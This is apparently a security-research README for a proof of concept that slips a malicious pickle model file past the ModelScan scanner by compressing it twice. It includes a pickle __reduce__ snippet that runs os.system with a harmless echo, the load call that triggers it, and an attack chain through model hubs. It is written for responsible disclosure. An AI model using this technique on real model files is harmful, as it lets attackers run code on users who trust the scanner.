| # ModelScan Bypass - Double Compression | |
| **Security Research - ModelScan Bypass Technique** | |
| ## Overview | |
| This repository contains a proof-of-concept demonstrating a bypass technique for ModelScan, | |
| a popular ML model security scanner. This technique allows malicious pickle-based model files | |
| to evade detection. | |
| ## Technique | |
| **Nested/double compression** | |
| Payload compressed twice (gzip then bz2) | |
| ## ModelScan Result | |
| **SKIPPED - Scanner did not analyze this file** | |
| ## File | |
| - `exploit_double_compression.joblib.gz.bz2` | |
| ## Reproduction Steps | |
| ### Testing with ModelScan | |
| ```bash | |
| # Install ModelScan | |
| pip install modelscan | |
| # Download the exploit file from this repository | |
| # Then scan it | |
| modelscan scan -p exploit_double_compression.joblib.gz.bz2 | |
| ``` | |
| ### Expected Result | |
| SKIPPED - Scanner did not analyze this file | |
| ### Triggering the Exploit (⚠️ DO NOT RUN ON PRODUCTION) | |
| ```python | |
| import joblib | |
| # WARNING: This will execute arbitrary code! | |
| model = joblib.load('exploit_double_compression.joblib.gz.bz2') | |
| ``` | |
| ## Technical Details | |
| This exploit uses Python's pickle `__reduce__` method for RCE: | |
| ```python | |
| def __reduce__(self): | |
| import os | |
| return (os.system, ('echo "RCE executed!"',)) | |
| ``` | |
| **Why ModelScan misses this:** | |
| Payload compressed twice (gzip then bz2) | |
| ## Security Impact | |
| **Severity**: HIGH | |
| **Attack Vector**: | |
| 1. Attacker creates malicious model using this technique | |
| 2. Uploads to model hub (HuggingFace, etc.) | |
| 3. Victim downloads and scans with ModelScan | |
| 4. Scanner reports "No issues found!" or skips the file | |
| 5. Victim loads model → RCE | |
| ## Part of Larger Research | |
| This is one of four bypass techniques discovered: | |
| 1. [Compression Mismatch](https://huggingface.co/sandeep1337/modelscan-bypass-compression-mismatch) | |
| 2. [Double Compression](https://huggingface.co/sandeep1337/modelscan-bypass-double-compression) | |
| 3. [Corrupt Header](https://huggingface.co/sandeep1337/modelscan-bypass-corrupt-header) | |
| 4. [Memmap Bypass ⭐](https://huggingface.co/sandeep1337/modelscan-bypass-memmap) - PRIMARY FINDING | |
| ## Disclosure | |
| This research is being submitted to Huntr's bug bounty program for responsible disclosure. | |
| **Date**: December 25, 2024 | |
| **Researcher**: Security Research Team | |
| ## References | |
| - [Huntr Bug Bounty](https://huntr.com/) | |
| - [ModelScan GitHub](https://github.com/protectai/modelscan) | |
| ## Disclaimer | |
| ⚠️ **For Security Research Only** | |
| This file is provided for security research and vulnerability disclosure purposes only. | |
| Do not use this technique for malicious purposes. Loading this file will execute code. | |
| --- | |
| **Status**: Under responsible disclosure to Huntr bug bounty program | |